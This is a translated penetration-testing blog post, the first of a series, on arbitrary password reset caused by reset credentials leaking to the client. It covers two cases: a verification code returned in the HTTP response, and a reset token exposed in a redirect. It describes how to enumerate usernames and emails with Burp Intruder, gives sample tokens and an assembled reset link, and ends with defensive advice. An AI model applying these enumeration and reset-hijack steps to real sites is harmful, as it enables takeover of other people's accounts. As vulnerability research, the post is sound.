Any user password reset (1): reset credentials leak

Category: Tag:

Previous article:

Any user password reset (3): user confusion

Any user password reset (2): The receiver of the reset credential can be tampered

Among logic vulnerabilities, arbitrary user password reset is the most common, which may appear on the new user registration page, or the page for resetting the password after the user logs in, or the password recovery page when the user forgets the password. Among them, the password retrieval function is the hardest hit by the vulnerability. I analyzed the causes of the vulnerabilities in the cases encountered in the daily penetration process. This time, I will focus on any user password reset problems caused by the leakage of reset credentials.

Case number one

When retrieving the password by email, the verification code as the reset credential is sent to the client in the HTTP response, and it can be easily obtained after capturing the packet. First use the attacker account to go through the process of password retrieval. The test account is yangyangwithgnu@yeah.net, and the email address is used to retrieve the password:

Click to get the check code and grab the following response:

 

 

Among them, VFCode is likely to be a check code. Log in to the mailbox to check the password retrieval email sent from the website:

 

It is found that the two are the same, then it can almost be confirmed that the server leaked the verification code of the password retrieval to the client, which may cause any account password reset problem.

Try to retrieve the password of the normal account. After entering the mailbox on the password retrieval page, the system will immediately verify whether the mailbox is registered:

Define the UName parameter as an enumerated variable, and use common qq mailboxes as a dictionary to enumerate multiple valid mailboxes:

 

Take chenwei@qq.com as an example, find the check code in the response packet, successfully reset its password to PenTest1024, and verify whether you can log in:

 

Try to retrieve the password of the administrator account. From the domain name registration information of this website, the email address of the contact person is found to be fishliu@xxxx.cn. It can be inferred that the email suffix of the back-end user is @xxxx.cn. Therefore, simple adjustment of common back-end user names can construct a back-end user mailbox dictionary. Then enumerate a large number of background users:

 

In the same way, the account passwords of these background users can be reset. In order to avoid affecting the business, no actual operation is performed.

 

Case two

 

When retrieving the password by email, the reset link with the credentials leaked to the client, which can be obtained by capture. Use the attacker’s account to go through the process of password retrieval once. Enter the attacker’s account and email (yangyangwithgnu, yangyangwithgnu@yeah.net) on the password recovery page and submit:

Intercept the following responses:

Obviously it is a redirection. The two parameters of isVerify and PassPhrase are suspicious and should be paid attention to in subsequent interactions. Let the data packet pass first, enter the page to send the reset email, enter the verification code and submit. Log in to the attacker’s mailbox to view the reset email:

The following content is visible to members

[wc_pay_can_read   id=’2026,2029,2030′  tishi=’You do not have permission to read this content, click here to become a member and refresh this page to read it’]

This reset link with token is very familiar. Yes, it is the token information obtained from the previous packet capture. Compare:

forgotPwdEa.php?isVerify=eWFuZ3lhbmd3aXRoZ251fHlhbmd5YW5nd2l0aGdudUB5ZWFoLm5ldHw2MzQyNDkw&PassPhrase=01e4f6d4ede81b2604dc320bc4e3a6e8
forgotPwdEc.php?isVerify=eWFuZ3lhbmd3aXRoZ251fHlhbmd5YW5nd2l0aGdudUB5ZWFoLm5ldHw2MzQyNDkw&PassPhrase=01e4f6d4ede81b2604dc320bc4e3a6e8

The only difference is the two file names forgotPwdEa and forgotPwdEc.

Next, verify that the token leaked through the server can reset the account password of the ordinary user. As can be seen from the reset process, to reset the password, you must provide your username and its email (or mobile phone number).

Get a valid user name. In the registration page, after entering the user name, immediately verify whether the user name is occupied:

The corresponding request and response are as follows:

 

 

If the user name already exists, it returns failed, if it does not exist, it returns ok. With this feature, with a common name dictionary, a large number of valid user names (such as chenchuan, chenanqi, chenanxiu, zhangfeng, etc.) can be enumerated and saved as username.txt.

Get the mailbox corresponding to the valid user name. In the request submitted by the password retrieval page, if the user_name matches the email parameter, the HTTP response code is 302, and the interactive package is as follows:

 

This feature can enumerate valid user names and their mailboxes. Now consider how to make a mailbox dictionary. Many users like to register qq email with their username. In other words, the username yangyangwithgnu may correspond to the email yangyangwithgnu@qq.com. Therefore, the mailbox dictionary qq-email.txt is quickly created by using the valid username dictionary username.txt that has been obtained earlier, in which username.txt corresponds to qq-email.txt line by line.

For example, the former acts as yangyangwithgnu first, and the latter acts as yangyangwithgnu@qq.com. Put the above data packet into burp’s intrduer, and select pitchfork as the attack type. The parameter value of user_name is defined as enumerated variable 1 and the dictionary username.txt is loaded, and the parameter value of email is defined as enumerated variable 2 and the dictionary qq-email.txt is loaded, which can enumerate a large number of valid user name/mailbox information, such as, zhangfeng/zhangfeng@qq.com, chenchuan/chenchuan@qq.com, etc.

Use ordinary account chenchuan/chenchuan@qq.com to demonstrate the password reset vulnerability. Enter the username and password to submit, complete the password retrieval logic normally, and obtain the reset token issued by the server from the interactive package:

isVerify=Y2hlbmNodWFufGNoZW5jaHVhbkBxcS5jb218MTE2MDIzNw==&PassPhrase=cbf0160662358808f3586868f041cbaa 

Assemble the reset link http://www.xxxx.com/user/forgotPwdEc.php?isVerify=Y2hlbmNodWFufGNoZW5jaHVhbkBxcS5jb218MTE2MDIzNw==&PassPhrase=cbf0160662358808f3586868f041cbaa, you can enter the link to reset the password:

 

After entering the new password PenTest1024, the system prompts that the modification is successful. Log in successfully with chenchuan/PenTest1024:

 

In terms of defensive measures, the credentials for password retrieval must not be issued to the client. In addition, a picture verification code should be added when verifying whether the mailbox is valid to prevent key parameters from being enumerated.

[/wc_pay_can_read]

Reviews

There are no reviews yet.

Be the first to review “Any user password reset (1): reset credentials leak”

Your email address will not be published. Required fields are marked *